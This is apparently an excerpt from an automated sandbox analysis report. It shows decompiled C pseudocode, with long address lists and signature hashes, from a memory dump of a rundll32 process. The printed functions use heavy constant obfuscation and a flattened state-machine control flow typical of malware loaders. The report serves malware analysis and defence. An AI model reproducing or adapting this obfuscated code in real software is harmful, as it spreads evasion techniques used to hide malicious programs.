                                                                                                                      0x0069109f
                                                                                                                      0x006910aa
                                                                                                                      0x006910bf
                                                                                                                      0x006910c2
                                                                                                                      0x006910c9
                                                                                                                      0x006910d4
                                                                                                                      0x006910df
                                                                                                                      0x006910e6
                                                                                                                      0x006910f1
                                                                                                                      0x006910f9
                                                                                                                      0x00691105
                                                                                                                      0x00691109
                                                                                                                      0x0069110e
                                                                                                                      0x00691116
                                                                                                                      0x00691121
                                                                                                                      0x0069112c
                                                                                                                      0x00691137
                                                                                                                      0x0069113f
                                                                                                                      0x00691144
                                                                                                                      0x0069114c
                                                                                                                      0x00691154
                                                                                                                      0x0069115f
                                                                                                                      0x0069116a
                                                                                                                      0x00691175
                                                                                                                      0x0069117d
                                                                                                                      0x00691185
                                                                                                                      0x0069118a
                                                                                                                      0x00691192
                                                                                                                      0x0069119a
                                                                                                                      0x006911a2
                                                                                                                      0x006911aa
                                                                                                                      0x006911b7
                                                                                                                      0x006911ba
                                                                                                                      0x006911be
                                                                                                                      0x006911c6
                                                                                                                      0x006911ce
                                                                                                                      0x006911d3
                                                                                                                      0x006911db
                                                                                                                      0x006911e3
                                                                                                                      0x006911eb
                                                                                                                      0x006911f0
                                                                                                                      0x006911f5
                                                                                                                      0x006911fd
                                                                                                                      0x00691205
                                                                                                                      0x00691215
                                                                                                                      0x00691219
                                                                                                                      0x00691222
                                                                                                                      0x00691227
                                                                                                                      0x0069122d
                                                                                                                      0x00691235
                                                                                                                      0x00691247
                                                                                                                      0x0069124a
                                                                                                                      0x00691251
                                                                                                                      0x0069125c
                                                                                                                      0x00691267
                                                                                                                      0x0069126f
                                                                                                                      0x0069127a
                                                                                                                      0x00691282
                                                                                                                      0x0069128a
                                                                                                                      0x00691292
                                                                                                                      0x0069129a
                                                                                                                      0x006912a7
                                                                                                                      0x006912b9
                                                                                                                      0x006912bd
                                                                                                                      0x006912c2
                                                                                                                      0x006912c7
                                                                                                                      0x006912cf
                                                                                                                      0x006912d7
                                                                                                                      0x006912e1
                                                                                                                      0x006912e5
                                                                                                                      0x006912ed
                                                                                                                      0x006912f5
                                                                                                                      0x006912f9
                                                                                                                      0x00691301
                                                                                                                      0x00691309
                                                                                                                      0x00691311
                                                                                                                      0x00691319
                                                                                                                      0x00691321
                                                                                                                      0x00691325
                                                                                                                      0x0069132d
                                                                                                                      0x0069133a
                                                                                                                      0x0069133e
                                                                                                                      0x00691343
                                                                                                                      0x0069134b
                                                                                                                      0x00691353
                                                                                                                      0x0069135b
                                                                                                                      0x00691365
                                                                                                                      0x00691369
                                                                                                                      0x00691371
                                                                                                                      0x0069137c
                                                                                                                      0x00691387
                                                                                                                      0x00691392
                                                                                                                      0x0069139f
                                                                                                                      0x006913a3
                                                                                                                      0x006913ab
                                                                                                                      0x006913b3
                                                                                                                      0x006913bb
                                                                                                                      0x006913c0
                                                                                                                      0x006913c5
                                                                                                                      0x006913c9
                                                                                                                      0x006913d1
                                                                                                                      0x006913d9
                                                                                                                      0x006913e4
                                                                                                                      0x006913ef
                                                                                                                      0x006913fa
                                                                                                                      0x00691402
                                                                                                                      0x0069140a
                                                                                                                      0x00691412
                                                                                                                      0x0069141a
                                                                                                                      0x00691422
                                                                                                                      0x0069142a
                                                                                                                      0x00691432
                                                                                                                      0x0069143a
                                                                                                                      0x00691442
                                                                                                                      0x0069144a
                                                                                                                      0x00691458
                                                                                                                      0x00691572
                                                                                                                      0x00000000
                                                                                                                      0x0069145e
                                                                                                                      0x0069145e
                                                                                                                      0x00691460
                                                                                                                      0x0069163b
                                                                                                                      0x0069163b
                                                                                                                      0x00691641
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00691466
                                                                                                                      0x00691485
                                                                                                                      0x006914bc
                                                                                                                      0x006914c3
                                                                                                                      0x006914c8
                                                                                                                      0x006914d1
                                                                                                                      0x00691524
                                                                                                                      0x00691536
                                                                                                                      0x00691554
                                                                                                                      0x0069155b
                                                                                                                      0x00691560
                                                                                                                      0x00691565
                                                                                                                      0x0069156b
                                                                                                                      0x00000000
                                                                                                                      0x0069156b
                                                                                                                      0x00691565
                                                                                                                      0x00691460
                                                                                                                      0x00691651
                                                                                                                      0x00691651
                                                                                                                      0x00691579
                                                                                                                      0x00691587
                                                                                                                      0x0069158b
                                                                                                                      0x0069159a
                                                                                                                      0x0069159b
                                                                                                                      0x006915a0
                                                                                                                      0x006915a9
                                                                                                                      0x006915f0
                                                                                                                      0x006915fc
                                                                                                                      0x00691605
                                                                                                                      0x0069160d
                                                                                                                      0x0069160f
                                                                                                                      0x00691613
                                                                                                                      0x00691614
                                                                                                                      0x00691615
                                                                                                                      0x00691616
                                                                                                                      0x00691617
                                                                                                                      0x00691629
                                                                                                                      0x0069162d
                                                                                                                      0x0069162e
                                                                                                                      0x00691633
                                                                                                                      0x00691636
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fo$M_o9$[K
                                                                                                                      • API String ID: 0-3743190696
                                                                                                                      • Opcode ID: 59ccfd4b88bafa1448f3e74d2f5b446880fbc73a78ed17dd742be059d1b6315f
                                                                                                                      • Instruction ID: 490d8806b87517924f78af0317fc1c53140179da54b5f5f43440c5edec9b7b1d
                                                                                                                      • Opcode Fuzzy Hash: 59ccfd4b88bafa1448f3e74d2f5b446880fbc73a78ed17dd742be059d1b6315f
                                                                                                                      • Instruction Fuzzy Hash: 211201B1409381CFD3A8CF21C58AA9BBBF2FBC5748F10891DE59996260D7B18909CF57
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00689DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E00689DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E0069DCF7(_v80, 0x6817a0, __eflags);
									_pop(_t327);
									E006847CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E00689DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E0068A8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E0068A918(_t317, __eflags, _v8, _v96, E0069DCF7(_v56, 0x681770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E0068A8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E00687E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E00684635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E00688ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                      0x00689dd9
                                                                                                                      0x00689dde
                                                                                                                      0x00689de1
                                                                                                                      0x00689de4
                                                                                                                      0x00689de7
                                                                                                                      0x00689de8
                                                                                                                      0x00689deb
                                                                                                                      0x00689dee
                                                                                                                      0x00689def
                                                                                                                      0x00689df0
                                                                                                                      0x00689df5
                                                                                                                      0x00689dfc
                                                                                                                      0x00689dff
                                                                                                                      0x00689e08
                                                                                                                      0x00689e0f
                                                                                                                      0x00689e14
                                                                                                                      0x00689e1b
                                                                                                                      0x00689e22
                                                                                                                      0x00689e25
                                                                                                                      0x00689e2c
                                                                                                                      0x00689e33
                                                                                                                      0x00689e3f
                                                                                                                      0x00689e44
                                                                                                                      0x00689e49
                                                                                                                      0x00689e50
                                                                                                                      0x00689e57
                                                                                                                      0x00689e5e
                                                                                                                      0x00689e65
                                                                                                                      0x00689e70
                                                                                                                      0x00689e71
                                                                                                                      0x00689e74
                                                                                                                      0x00689e7f
                                                                                                                      0x00689e82
                                                                                                                      0x00689e89
                                                                                                                      0x00689e90
                                                                                                                      0x00689e97
                                                                                                                      0x00689e9e
                                                                                                                      0x00689ea9
                                                                                                                      0x00689eac
                                                                                                                      0x00689eb3
                                                                                                                      0x00689eba
                                                                                                                      0x00689ebe
                                                                                                                      0x00689ec5
                                                                                                                      0x00689ed1
                                                                                                                      0x00689ed8
                                                                                                                      0x00689edb
                                                                                                                      0x00689ee2
                                                                                                                      0x00689ee9
                                                                                                                      0x00689ef0
                                                                                                                      0x00689ef7
                                                                                                                      0x00689efe
                                                                                                                      0x00689f02
                                                                                                                      0x00689f09
                                                                                                                      0x00689f10
                                                                                                                      0x00689f17
                                                                                                                      0x00689f1e
                                                                                                                      0x00689f25
                                                                                                                      0x00689f2c
                                                                                                                      0x00689f33
                                                                                                                      0x00689f3a
                                                                                                                      0x00689f41
                                                                                                                      0x00689f48
                                                                                                                      0x00689f4f
                                                                                                                      0x00689f56
                                                                                                                      0x00689f5d
                                                                                                                      0x00689f64
                                                                                                                      0x00689f6b
                                                                                                                      0x00689f71
                                                                                                                      0x00689f78
                                                                                                                      0x00689f7f
                                                                                                                      0x00689f86
                                                                                                                      0x00689f92
                                                                                                                      0x00689f97
                                                                                                                      0x00689f9c
                                                                                                                      0x00689fa3
                                                                                                                      0x00689faa
                                                                                                                      0x00689fb1
                                                                                                                      0x00689fbc
                                                                                                                      0x00689fbf
                                                                                                                      0x00689fc2
                                                                                                                      0x00689fc9
                                                                                                                      0x00689fd0
                                                                                                                      0x00689fde
                                                                                                                      0x00689fe1
                                                                                                                      0x00689fe8
                                                                                                                      0x00689fef
                                                                                                                      0x00689ffa
                                                                                                                      0x00689ffd
                                                                                                                      0x0068a000
                                                                                                                      0x0068a007
                                                                                                                      0x0068a00e
                                                                                                                      0x0068a012
                                                                                                                      0x0068a019
                                                                                                                      0x0068a01c
                                                                                                                      0x0068a023
                                                                                                                      0x0068a02e
                                                                                                                      0x0068a038
                                                                                                                      0x0068a03b
                                                                                                                      0x0068a03f
                                                                                                                      0x0068a046
                                                                                                                      0x0068a051
                                                                                                                      0x0068a052
                                                                                                                      0x0068a055
                                                                                                                      0x0068a059
                                                                                                                      0x0068a060
                                                                                                                      0x0068a06b
                                                                                                                      0x0068a06e
                                                                                                                      0x0068a075
                                                                                                                      0x0068a07c
                                                                                                                      0x0068a083
                                                                                                                      0x0068a08a
                                                                                                                      0x0068a091
                                                                                                                      0x0068a098
                                                                                                                      0x0068a09f
                                                                                                                      0x0068a0aa
                                                                                                                      0x0068a0ad
                                                                                                                      0x0068a0b1
                                                                                                                      0x0068a0b5
                                                                                                                      0x0068a0bc
                                                                                                                      0x0068a0c8
                                                                                                                      0x0068a0cb
                                                                                                                      0x0068a0d2
                                                                                                                      0x0068a0d9
                                                                                                                      0x0068a0e0
                                                                                                                      0x0068a0e7
                                                                                                                      0x0068a0eb
                                                                                                                      0x0068a0f2
                                                                                                                      0x0068a0f5
                                                                                                                      0x0068a0fc
                                                                                                                      0x0068a103
                                                                                                                      0x0068a10a
                                                                                                                      0x0068a111
                                                                                                                      0x0068a111
                                                                                                                      0x0068a113
                                                                                                                      0x00000000
                                                                                                                      0x0068a114
                                                                                                                      0x0068a126
                                                                                                                      0x0068a2d3
                                                                                                                      0x0068a2d9
                                                                                                                      0x00000000
                                                                                                                      0x0068a2d9
                                                                                                                      0x0068a132
                                                                                                                      0x0068a1fa
                                                                                                                      0x0068a200
                                                                                                                      0x0068a2bf
                                                                                                                      0x0068a2c6
                                                                                                                      0x0068a2c8
                                                                                                                      0x0068a174
                                                                                                                      0x0068a174
                                                                                                                      0x0068a111
                                                                                                                      0x0068a111
                                                                                                                      0x0068a113
                                                                                                                      0x00000000
                                                                                                                      0x0068a113
                                                                                                                      0x0068a111
                                                                                                                      0x0068a206
                                                                                                                      0x0068a20d
                                                                                                                      0x0068a236
                                                                                                                      0x0068a236
                                                                                                                      0x0068a23a
                                                                                                                      0x0068a23c
                                                                                                                      0x0068a244
                                                                                                                      0x0068a24a
                                                                                                                      0x0068a250
                                                                                                                      0x0068a273
                                                                                                                      0x0068a294
                                                                                                                      0x0068a2a1
                                                                                                                      0x0068a2a6
                                                                                                                      0x0068a2ab
                                                                                                                      0x0068a2ab
                                                                                                                      0x0068a22c
                                                                                                                      0x0068a22c
                                                                                                                      0x00000000
                                                                                                                      0x0068a22c
                                                                                                                      0x0068a20f
                                                                                                                      0x0068a217
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a219
                                                                                                                      0x0068a220
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a222
                                                                                                                      0x0068a22a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a22a
                                                                                                                      0x0068a13e
                                                                                                                      0x0068a1af
                                                                                                                      0x0068a1b7
                                                                                                                      0x0068a1d7
                                                                                                                      0x0068a1dc
                                                                                                                      0x0068a1e7
                                                                                                                      0x0068a1ed
                                                                                                                      0x0068a111
                                                                                                                      0x0068a111
                                                                                                                      0x0068a113
                                                                                                                      0x00000000
                                                                                                                      0x0068a113
                                                                                                                      0x0068a111
                                                                                                                      0x0068a146
                                                                                                                      0x0068a192
                                                                                                                      0x0068a197
                                                                                                                      0x0068a199
                                                                                                                      0x0068a19c
                                                                                                                      0x0068a19f
                                                                                                                      0x0068a30b
                                                                                                                      0x0068a30b
                                                                                                                      0x0068a30b
                                                                                                                      0x0068a1a5
                                                                                                                      0x00000000
                                                                                                                      0x0068a1a5
                                                                                                                      0x0068a14e
                                                                                                                      0x0068a2f9
                                                                                                                      0x0068a2f9
                                                                                                                      0x0068a2ff
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a2ff
                                                                                                                      0x0068a161
                                                                                                                      0x0068a16c
                                                                                                                      0x0068a16e
                                                                                                                      0x00000000
                                                                                                                      0x0068a16e
                                                                                                                      0x0068a2eb
                                                                                                                      0x0068a2f3
                                                                                                                      0x0068a2f8
                                                                                                                      0x00000000
                                                                                                                      0x0068a2f8

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H&!$Up7$yBd&
                                                                                                                      • API String ID: 0-2352930472
                                                                                                                      • Opcode ID: 917ca898db0dc3a660e8521bdac44c3383e7313a456cafe04c1ba179e828769d
                                                                                                                      • Instruction ID: 6433a80366259b7d065113bd49eeb5b8695b5f83d24a86447e8844a260814514
                                                                                                                      • Opcode Fuzzy Hash: 917ca898db0dc3a660e8521bdac44c3383e7313a456cafe04c1ba179e828769d
                                                                                                                      • Instruction Fuzzy Hash: 38E16471D0021DDBDF28DFE4D98A9EEBBB2FB44314F20825AE515BA264D7B40A45CF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006995FA Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006995FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E00685DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E0069DCF7(_v632, 0x681000, __eflags);
								_pop(_t317);
								_t299 =  *0x6a3e10; // 0x0
